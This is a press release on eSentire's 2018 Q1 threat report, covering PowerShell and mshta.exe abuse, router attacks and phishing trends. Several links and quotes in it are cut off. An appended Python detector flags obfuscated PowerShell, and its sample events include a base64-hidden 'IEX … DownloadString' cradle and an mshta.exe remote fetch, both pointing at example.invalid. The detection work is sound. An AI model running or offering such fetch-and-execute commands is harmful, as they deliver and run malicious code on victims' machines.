91% of Critical Endpoint Security Events Leverage PowerShell to Cloak Detection
eSentire Notes MSPs, Trusted Cloud Platforms, and Consumer-Grade Routers Also Pose Problems
By: eSentire

"eSentire Threat Intelligence data shows heavy use of legitimate Microsoft binaries, such as PowerShell and mshta.exe, popular tools for downloading and executing malicious code in the initial stages of a malware infection," said Eldon Sprickerhoff, founder and chief security strategist, eSentire. "PowerShell can also be leveraged by adversaries to reduce their on-disk footprint and evade detective controls by operating in memory and obfuscating command-line parameters."

In late January 2018, an eSentire advanced threat analytics operation (powered by machine learning and coined "Blue Steel"), detected an adversary leveraging an unknown exploit in Kaseya's Virtual System Administrator (VSA) (https://helpdesk.kaseya.com/

539% Increase in Consumer-Grade Router Attacks

The report also indicates a dramatic increase in attacks targeting popular consumer-grade routers, like Netgear and Linksys (both of whom own a significant share of the consumer network device market, at 51% and 26% respectively*). Trending in router exploitations was first observed in late 2017 when the Reaper Botnet (https://www.esentire.com/

"The increase in attacks against consumer network devices can be attributed to the perceived value in recruiting devices for attacks against businesses, as opposed to leveraging them as potential network entry-points,"

Additional Report Findings:

- Phishing rose 39% across industries, with DocuSign, Office 365, and OneDrive as the most popular lures. Office 365 showed the highest success rate and popularity, growing 5x over 2017 despite DocuSign being the most popular lure used.
- Education, retail, biotechnology, construction, and non-profit organizations saw the greatest rise in exploit attempts due to a high degree of consumer-grade router exploit attempts, brute forcing, and web server exploit attempts.
- Most brute force attacks originated from infrastructure based in China, followed by the United States, Germany, and Russia.
- Malicious code (+35%) and phishing (+39%) saw increases in the first quarter of 2018 with malicious code incidents continuing to favor email as a delivery vector.

"While industry sentiment is focused on the ever-changing threat landscape, the data suggests that it's the cybercriminal landscape that's shifting. As we continue to see successful efforts in disrupting malicious infrastructure and comprehensive threat blocking, cybercriminals are forced to diversify their hacking methods. They're pivoting to use new methods for sustaining infrastructure,"

Methodology

The eSentire Threat Intelligence team used data gathered from 1,500+ proprietary network and host-based detection sensors distributed globally across multiple industries. Raw data was normalized and aggregated using automated machine-based processing methods. Processed data was reviewed by a visual data analyst applying quantitative analysis methods. Quantitative intelligence analysis results were further processed by a qualitative intelligence analyst resulting in a written analytical product.

eSentire's 2018 Q1 Threat Report (https://www.esentire.com/

To access a complete copy of the report, visit: https://www.esentire.com/

About eSentire:

eSentire® (http://www.esentire.com)

*Source: The NPD Group U.S. Monthly Retail Tracking Service, Routers, Multiband Transmission Speed: 1800 Mbps- 5400 Mbps, Wireless Technology: 802.11ac, 4Q16, based on dollar share.

Products, service names, and company logos mentioned herein may be the registered trademarks of their respective owners. All rights reserved.

PR Contacts:

Angela Tuzzo
MRB Public Relations for eSentire
+1 732.758.1100, x. 105
atuzzo@mrb-pr.com

Mandy Bachus
eSentire Corporate Communications
+1 226.338.7135
mandy.bachus@
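The Sprickerhoff quote above describes PowerShell run with obfuscated command-line parameters and in-memory download code, and mshta.exe fetching payloads. The following is an added example, not eSentire's code or any detection from the report: it scores constructed process-creation command lines for those indicators and decodes -EncodedCommand payloads so the hidden script is readable by an analyst; the indicator weights and sample events are assumptions made for this illustration.

```python
import base64
import re

# Indicator patterns for the behaviours the report names: PowerShell launched with
# encoded/obfuscated parameters, in-memory download cradles, and mshta.exe pulling
# remote code. The weights are an assumption for this example, not report figures.
INDICATORS = {
    "encoded_command": (3, re.compile(r"\s-(?:e|ec|en|enc[a-z]*)\s+[A-Za-z0-9+/=]{16,}", re.I)),
    "hidden_window": (1, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    "no_profile": (1, re.compile(r"-nop(?:rofile)?\b", re.I)),
    "download_cradle": (3, re.compile(r"downloadstring|downloadfile|net\.webclient|"
                                      r"invoke-webrequest|\biex\b|invoke-expression", re.I)),
    "mshta_remote": (3, re.compile(r"mshta(?:\.exe)?\s.*https?://", re.I)),
}

def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or None.
    PowerShell accepts any unambiguous prefix of the switch (-e, -ec, -enc, ...)."""
    m = re.search(r"\s-(?:e|ec|en|enc[a-z]*)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed or truncated payload: unreadable, but still flagged

def score_event(cmdline):
    """Score one command line; cradle patterns are also run over the decoded script."""
    hits = [name for name, (_, rx) in INDICATORS.items() if rx.search(cmdline)]
    decoded = decode_encoded_command(cmdline)
    if decoded and "download_cradle" not in hits and INDICATORS["download_cradle"][1].search(decoded):
        hits.append("download_cradle")
    return {"hits": hits, "score": sum(INDICATORS[h][0] for h in hits), "decoded": decoded}

def triage(events, threshold=3):
    """Return events scoring at or above the threshold, most suspicious first."""
    scored = [{"pid": ev["pid"], **score_event(ev["cmdline"])} for ev in events]
    return sorted((r for r in scored if r["score"] >= threshold),
                  key=lambda r: r["score"], reverse=True)

# Constructed sample process-creation events, not real telemetry. Event 101 carries a
# download cradle hidden behind -Enc; event 104 carries an unreadable blob.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
SAMPLE_EVENTS = [
    {"pid": "101", "cmdline": "powershell.exe -NoP -W Hidden -Enc "
                              + base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")},
    {"pid": "102", "cmdline": "mshta.exe http://example.invalid/payload.hta"},
    {"pid": "103", "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"pid": "104", "cmdline": "powershell.exe -nop -w hidden -enc AAAAAAAAAAAAAAAAAAAAAAA"},
]
```

Running triage(SAMPLE_EVENTS) ranks the encoded cradle first, the unreadable-but-hidden launch second, and the mshta.exe fetch third, while the plain backup script is not reported.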